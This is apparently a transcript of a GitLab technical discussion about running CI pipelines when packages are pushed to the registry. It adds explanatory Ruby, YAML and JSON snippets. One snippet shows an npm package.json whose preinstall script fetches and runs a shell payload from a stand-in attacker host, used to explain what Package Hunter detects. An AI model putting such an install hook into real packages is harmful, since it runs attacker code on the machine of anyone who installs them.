From YouTube: Technical discussion on CI Pipelines for packages
A: Hello everyone, I'm David from the package team, and today we'll be discussing the technical changes for this idea of pipelines. With me today I have Jegosh, Staff Backend Engineer at GitLab. Let's dive in, I guess.
A: The main idea: usually you trigger a pipeline when you have a git push, and the idea here is to trigger a pipeline when a package is pushed to the package registry. So we do have a new event, the package push. The thing is, the package can come from several sources.
A: It can come from a CI pipeline in a GitLab project. It can come from an external process: you could have an external CI pipeline building the package and pushing it to the GitLab package registry. And it can also come from a manual process: you could very well build your package on your console and push it to the package registry.
A: I guess I will share my screen, and this way we will see the changes. Okay, so the changes I had to make are in two different projects: the Rails backend and the GitLab Runner. Let's start with the Rails backend.
B: I have a few questions, because I think it's a common theme to have a repository for a package and to build the package in the continuous integration / continuous delivery pipeline from that repository. So it feels a bit awkward that whenever you push such a package from a CI environment, you would still trigger another pipeline to validate something. I know it might be suitable for a different use case, but in this case it feels a bit disconnected from the usual workflow of building packages and publishing them within CI.
A: In the demo, one of the jobs runs Package Hunter. Package Hunter takes a package file and, I think, tries to install it and checks what it does to the system. This was a hot topic a few months ago: npm packages, for example, can have a preinstall script where you can put any shell command and do whatever you want.
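As an illustration of the kind of thing Package Hunter looks for, an npm `package.json` can declare a `preinstall` lifecycle script that runs an arbitrary shell command at install time (the package name and URL below are made up):

```json
{
  "name": "innocuous-lib",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "curl -s https://attacker.example/payload.sh | sh"
  }
}
```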
B: Yeah, I think it makes sense. Depending on how we configure the pipeline that gets created when a package is pushed, it might even make sense in a regular workflow, because you could, for example, run some pre-flight checks before the package is published: after confirming that it's already in the package repository, but while it's still waiting to be made available to everyone else.
B: So yeah, I think it makes sense. We still need to have a git repository, because we do need to keep it somewhere and it needs to be versioned, so the repository will be there anyway.
A: Yeah, okay. So the main issue I faced here is how you link a pipeline object with a package file, because in the packages domain we mainly have two models, the package and the package files. Here I wanted to link a pipeline with a package file, and the issue is that, as I said, we don't have any concept of a commit SHA or a reference or anything. So what I did is create an intermediary object, which I called a push.
A: Well, it's not a great name, and I guess there is a better one, but it's an object that gets created when you push a package file, and it links the package file and the pipeline. Can you see my screen clearly, or do you want me to increase the font size?
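A minimal sketch of that intermediary object in plain Ruby. The names `PackagePush`, `PackageFile`, and `Pipeline` are illustrative, not the actual GitLab models:

```ruby
# Illustrative stand-ins: in the Rails backend these would be ActiveRecord models.
PackageFile = Struct.new(:id, :file_name)
Pipeline    = Struct.new(:id, :status)

# The intermediary "push" record: created when a package file is uploaded,
# it links that file to the pipeline triggered by the upload. It stands in
# for the commit SHA / ref that a normal git-push pipeline would reference.
PackagePush = Struct.new(:package_file, :pipeline) do
  def pipeline_status
    pipeline ? pipeline.status : "none"
  end
end

file = PackageFile.new(1, "my-lib-1.0.0.tgz")
pipe = Pipeline.new(42, "success")
push = PackagePush.new(file, pipe)
puts push.pipeline_status  # prints "success"
```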
B: Okay. Creating pipelines for arbitrary actions, like packages being pushed, is not the challenge, because we are doing that already with ChatOps, for example, and it's an established pattern to run some kind of script whenever something happens.
B: How ChatOps is implemented is, in my opinion, still a bit rough; I would perhaps do it differently. But right now it's an established pattern, so I guess we can at least replicate some parts of it, and having some kind of identifier or SHA assigned whenever we push something might work. But then there are a couple of follow-up questions someone might ask. For example, do we want to trigger a separate pipeline every time someone pushes the same thing?
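One way to get such an identifier, sketched under the assumption that a content digest is a reasonable dedup key: hash the package file's bytes, so pushing byte-identical content twice yields the same ID and the second pipeline could be skipped. The helper name is hypothetical:

```ruby
require "digest"

# Hypothetical dedup key for a package push: the SHA256 of the file contents.
# Re-pushing byte-identical content produces the same key.
def push_identifier(file_bytes)
  Digest::SHA256.hexdigest(file_bytes)
end

first   = push_identifier("package contents v1")
second  = push_identifier("package contents v1")
changed = push_identifier("package contents v2")

puts first == second   # true:  same content, same push id
puts first == changed  # false: new content, new push id
```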
B: The main challenge, in my opinion, is not really how we implement it, but the UX, because someone needs to somehow associate pipelines with the push events. We need some kind of view for that, if it doesn't exist already, and we need some way of telling users what the status of such a pipeline was, and so on. So in my opinion it's more of a UX challenge than a backend challenge, actually.
A: Well, for the UI it was far easier than I thought. Let me see if I can grab it; I don't have the demo running live.
A: That's fine, of course; I will reuse the video. Basically we have a screen with all your packages, where you can see the latest status of each package: it pulls the latest package file uploaded and the pipeline status for it. Here it is, so you have all the packages.
A: Yeah, I don't think I have that screen shown in the video, but actually you can click on the package and see the files. I did that for the demo, but I didn't use that screen. Let me show you; I think we have it here.
A: Any package will do. I put a pipeline status icon in this screen too. This screen shows the package and its files. For some package types we will allow duplicate uploads, meaning that you could overwrite a given version.
A: I don't think we have support for the yank command on npm, although that's a good question, because we are implementing a delete package file action in the UI, so you would have it here. Oh, actually, it was already there.
B: So I guess it's more of a UX discussion to have with a UX team member, right? It's presumably something that needs a design anyway, and you can always describe what the workflow looks like.
A: A few things were not working, like this commit column, since we are not referencing a commit, but the whole UI was working: the links were working, I could open the pipeline, and this screen, the pipeline details, was working too. So a good part of the UI is already working, but you are right that there are still some UX questions here.
A: Yeah, the thing is: what do you do in the case of pushing a package from the command line manually? You are not referencing any commit.
A: Well, for the demo, and this is another open question on the backend side, what do we do about the YAML file? For the demo I just used the regular standard YAML file, and it was picked up without referencing any commit.
B: But you had to create the standard, regular CI YAML file, and you had to put it into the repository under some kind of SHA, yeah? So there is a SHA of the commit being used to read the CI configuration, right? That's actually the connection with the repository, because we need to parse the `.gitlab-ci.yml` file from the repository, and that SHA is the version of the pipeline.
A: Okay, I see. Yeah, this was also a question: do we use the standard file, or do we use a dedicated one? The standard file being the `.gitlab-ci.yml` file.
B: I think if you want to be in line with what we are doing with ChatOps: ChatOps uses the standard YAML file, but there is a specific job that can only run for ChatOps. It's not very polished right now, because to indicate that a job is a ChatOps job, you just put the entry `only: [chat]`.
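`only: [chat]` is the real marker for ChatOps jobs in the standard `.gitlab-ci.yml`; a package-push equivalent might look like this (the `package_push` value is hypothetical, not an existing GitLab CI keyword):

```yaml
# Existing ChatOps pattern: this job only runs in pipelines created by a chat command.
time:
  only: [chat]
  script:
    - date

# Hypothetical analogue for the package push event (illustrative only).
package-scan:
  only: [package_push]
  script:
    - echo "Run checks against the pushed package file"
```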
A: Yeah, makes sense. My first idea was to have a different file, but I guess both sides have arguments, and I can see why it would be better to have everything in the same file.
B: Yeah, so I think there's some value in replicating how ChatOps works, and it's not only ChatOps. I think we also have some kind of action run when you edit something in the Web IDE. I can't remember exactly, you would need to check, but whenever you do something in the Web IDE, I remember that we also create a dangling pipeline.
A: Going back to the code: I do have a service creating the pipeline, and this is the part I'm not happy with. I'm using the regular create pipeline service, but I saw that some properties were mandatory, such as a ref, and I used `before_sha`. I'm not sure that was the proper way; I'm just putting in some values so that the service is happy.
B: I think that instead of that ref we can use the default branch, and instead of the push SHA we can actually use the latest commit on the master branch, right? Because you want to read the latest `.gitlab-ci.yml` file.
A: Yeah, correct. Okay, great. That's about it for the Rails part. Do you have any other questions?
A: Yeah, because by default the runner downloads the git repository, but the thing is, here it has to download the package file, not the git repository.
B: I think it still makes sense to download the repository, because you can put some support files in it that you are going to use in the package job, with an only-package rule or something like that, so downloading the git repository is fine.
B: What could be interesting is to serve the package as an artifact, so that you could reuse everything around downloading artifacts, because a package is actually an artifact, right? You would need to augment the code responsible for sending the details about artifacts to the runner.
B: Because the runner is able to, for example, retrieve objects from object storage, and it can retrieve zip files from GitLab; it can do a lot. So presenting the package file as an artifact could make it almost transparent. I guess you might not even need to change anything.
A: Yeah, both of these areas are kind of new to me, so I missed a lot of information. I implemented something similar: an API that will just pull the package file from object storage. But if something already exists, then yeah, totally, we should use that instead, and it will avoid any change on the runner side.
A: On the runner side, I had this question of whether the runner has to extract the package file, because package files are usually archives, but I feel that this is going a bit too far.
A: It's not the runner's responsibility to do that, and I guess it would be better to do it directly in the job.
A: For example, npm packages are tarball archives, so you could download one from object storage, but then if you want to, I don't know, analyze the `package.json` file, you need to extract the files from that archive.
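For instance, pulling `package.json` out of an npm-style tarball can be done in the job script itself; a sketch in Ruby using only the standard library (the tarball is built in memory just to make the example self-contained; a real job would download it from the registry):

```ruby
require "rubygems/package"
require "zlib"
require "stringio"

# Build a minimal npm-style tarball in memory (npm packs everything under "package/").
manifest = '{"name":"demo","version":"1.0.0"}'
tar_io = StringIO.new
Gem::Package::TarWriter.new(tar_io) do |tar|
  tar.add_file_simple("package/package.json", 0o644, manifest.bytesize) do |io|
    io.write(manifest)
  end
end
gzipped = StringIO.new
Zlib::GzipWriter.wrap(gzipped) { |gz| gz.write(tar_io.string) }

# Extract package.json from the archive, as the CI job would after downloading it.
extracted = nil
Zlib::GzipReader.wrap(StringIO.new(gzipped.string)) do |gz|
  Gem::Package::TarReader.new(gz).each do |entry|
    extracted = entry.read if entry.full_name == "package/package.json"
  end
end
puts extracted
```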
B: So basically I would say: leave that for the next iteration and do not extract anything. The runner can automatically extract zip files, and there is a type of artifact that will be downloaded without being extracted.
A: Yeah, the most common type is a zip file, but the file extension is not always zip. Java jar files, for example, are just regular zip files, but they don't have the zip file extension. But okay, I guess we can make this work with the artifact system, and it should be okay. Okay, this was way shorter than I thought.
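One consequence of jar files being zip files: since every zip-based format starts with the same magic bytes, code handling such artifacts could sniff the content instead of trusting the extension. A small sketch (`zip_archive?` is an illustrative helper, not an existing API):

```ruby
# Every zip archive, including .jar files, starts with the local-file-header
# signature "PK\x03\x04", so content sniffing works where the extension does not.
ZIP_MAGIC = "PK\x03\x04".b

def zip_archive?(bytes)
  bytes.b.start_with?(ZIP_MAGIC)
end

jar_header = "PK\x03\x04\x14\x00\x08\x08".b  # first bytes of a typical .jar entry
puts zip_archive?(jar_header)       # true
puts zip_archive?("plain text".b)   # false
```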